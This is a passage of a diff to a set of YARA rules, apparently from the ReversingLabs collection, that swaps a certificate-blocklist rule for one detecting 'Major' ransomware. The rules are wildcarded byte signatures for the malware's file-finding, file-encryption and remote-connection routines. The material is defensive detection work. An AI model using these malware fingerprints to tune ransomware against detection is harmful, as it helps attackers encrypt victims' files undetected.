+            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 55 41 54 41 55 41 56 41 57 48 8D A8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89
+            85 ?? ?? ?? ?? 45 33 E4 C7 44 24 ?? ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 89 25 ?? ?? ??
+            ?? 48 8D 95 ?? ?? ?? ?? 44 89 25 ?? ?? ?? ?? 33 C9 44 89 25 ?? ?? ?? ?? 45 8B FC 4C
+            89 25 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8
+            48 8D 85 ?? ?? ?? ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 66 44 89 20 4C 8D 05
+            ?? ?? ?? ?? 48 83 C0 ?? 4C 89 64 24 ?? 48 89 05 ?? ?? ?? ?? 45 33 C9 48 8D 05 ?? ??
+            ?? ?? 44 89 64 24 ?? 33 D2 48 89 05 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9
+            44 8D 42 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3
+            ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44
+            8B F0 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46
+        }
+		$find_files = {
+            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
+            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
+            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
+            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
+            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
+            5D C3
+        }
+		$remote_connection = {
+            44 0F B7 45 ?? 33 DB 48 8B 55 ?? 45 33 C9 48 89 5C 24 ?? 48 8B CE 89 5C 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ??
+            ?? 80 7D ?? ?? B9 ?? ?? ?? ?? 4C 8B 45 ?? B8 ?? ?? ?? ?? 48 8B 55 ?? 0F 44 C8 48 89
+            5C 24 ?? 45 33 C9 89 4C 24 ?? 89 4D ?? 49 8B CE 48 89 5C 24 ?? 48 89 5C 24 ?? FF 15
+            ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 4C 8D 4D ?? 4C 8D 45 ??
+            C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 4D ??
+            ?? ?? ?? ?? 4C 8D 45 ?? 41 B9 ?? ?? ?? ?? 48 8B CB 41 8D 51 ?? FF 15 ?? ?? ?? ?? 4C
+            8B 4D ?? 48 8B C7 48 F7 D8 48 8B D7 8B 45 ?? 48 8B CB 45 1B C0 89 44 24 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 33 FF 83 65 ?? ?? 48 8D 55 ?? 45 33 C9 45 33 C0 48 8B CB FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 49 8B CF 03 D7 E8 ?? ?? ?? ?? 44 8B 45 ?? 4C 8D 4D
+            ?? 8B D7 48 8B CB 48 03 D0 4C 8B F8 FF 15 ?? ?? ?? ?? 8B 45 ?? 03 F8 EB ?? 8B 45
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" and 1586091840 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_476De2F108D20B43Ba3Bae6F331Af8F1 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Major : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Major ransomware."
 		author = "ReversingLabs"
-		id = "5a741e6d-9b58-5536-8987-b3c36cdfcd5f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0c85aff8-1fb5-5e47-ae49-72445a000eaa"
+		date = "2021-01-26"
+		modified = "2021-01-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4216-L4232"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e5edf3e15b2139ba6cd85f2cfea63b53f7fa36a3fd7224a4a9ccbe5de6eb6f1d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Major.yara#L1-L261"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "16fb7763e3806fca6937fef7e8b3d8bccd61cb39549061d359d630c7d266c270"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Major"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 C0 89 4D ?? 57 50 66 89 45 ?? 8D 8D ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
+            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
+            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C9 8B F8 51 89 4D ?? 51 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ??
+            8D 45 ?? 50 FF 77 ?? 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 47 ?? 89 4D ?? BB ?? ?? ??
+            ?? 8B 48 ?? 89 01 8B 07 8D 4D ?? 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 45 ?? 3B C6
+        }
+		$find_files_p2 = {
+            0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ??
+            ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ??
+            ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 7E ??
+            ?? 73 ?? 8B 46 ?? 83 C0 ?? 74 ?? 03 C0 50 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? 8B 06 89 45 ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 89 45 ?? 8B 46 ?? 89 45 ?? C7 46 ?? ??
+            ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 66 89 06 8B 45 ?? 83 F8
+            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
+            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
+            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 3F 8D 77 ?? 8B
+            4F ?? 8B 07 89 01 8B 0F 8B 47 ?? 89 41 ?? 8B 45 ?? 48 89 45 ?? 89 45 ?? 8B 46 ?? 83
+            F8 ?? 72 ?? 8B 0E 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
+        }
+		$find_files_p3 = {
+            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
+            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ??
+            ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 57 66 89 06 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B
+            F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 66 66 66 0F 1F 84 00 ?? ?? ?? ?? 33 C0 C7 45
+            ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 0F 84 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 08 85 C9 74 ?? 8B 85 ?? ?? ?? ?? 8B 00 8D 14 41 EB ?? 8B 85
+            ?? ?? ?? ?? 8B 08 8B 85 ?? ?? ?? ?? 8B 00 8D 14 48 8B 85 ?? ?? ?? ?? 8B 08 2B D1 D1
+            FA 81 FA ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8D 04 12 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85
+            ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9
+            ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72
+            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1
+        }
+		$find_files_p4 = {
+            0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ??
+            83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B D4 33 C0 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 66 39 85 ?? ?? ??
+            ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B
+            CE D1 F9 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ??
+            ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 CB ?? C7 45 ??
+            ?? ?? ?? ?? 66 89 45 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D
+            51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 45 ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+        }
+		$find_files_p5 = {
+            83 CB ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 85 ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 85 C0 74 ??
+            C6 45 ?? ?? F6 C3 ?? 74 ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
+            E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? F6 C3 ??
+            74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40
+            8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ??
+            ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ??
+            ?? ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0
+        }
+		$find_files_p6 = {
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 E3 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72
+            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ??
+            ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ??
+            89 55 ?? 89 01 E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ??
+            8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9
+            ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? 89 55 ?? 89 55 ?? 89 01 8B 45 ?? 83 F8 ??
+            72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 75
+            ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 7D ??
+            8B CF E8 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 7D ?? E9 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F
+            84 ?? ?? ?? ?? 0F 1F 00 8B 45 ?? 8D 4D ?? 8B 00 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4
+        }
+		$find_files_p7 = {
+            8D 45 ?? 3B C6 74 ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8B C8 E8 ?? ?? ?? ?? 33
+            C0 C7 45 ?? ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 75
+            ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 00 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ??
+            6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF
+            75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 85 ?? ?? ?? ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 8B CC 50 0F 84 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8D 4D ?? FF 73 ?? 53 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            2B CE 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 46 8B 48 ?? 89 75 ?? 89 01 8B 45 ?? 83 F8
+            ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74
+            ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B CF 50 E8 ?? ?? ?? ?? 8B
+            45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 F6 0F 85 ??
+            ?? ?? ?? FF 75 ?? FF 15
+        }
+		$encrypt_files_p1 = {
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            45 ?? 83 7D ?? ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 45 ?? ??
+            ?? ?? ?? 6A ?? 50 66 89 45 ?? 8D 4D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F
+            43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 45 ?? FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 4D ?? 01 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 83 FA ?? 0F 8C ?? ??
+            ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 66 0F 1F 84 00
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85
+            FF 74 ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A
+        }
+		$encrypt_files_p2 = {
+            50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ??
+            8B 55 ?? 8B 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85
+            ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
+            ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ??
+            ?? ?? 56 E9 ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 72 ?? 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F
+            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2
+            0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B
+            55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55
+            ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+        }
+		$encrypt_files_p3 = {
+            E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
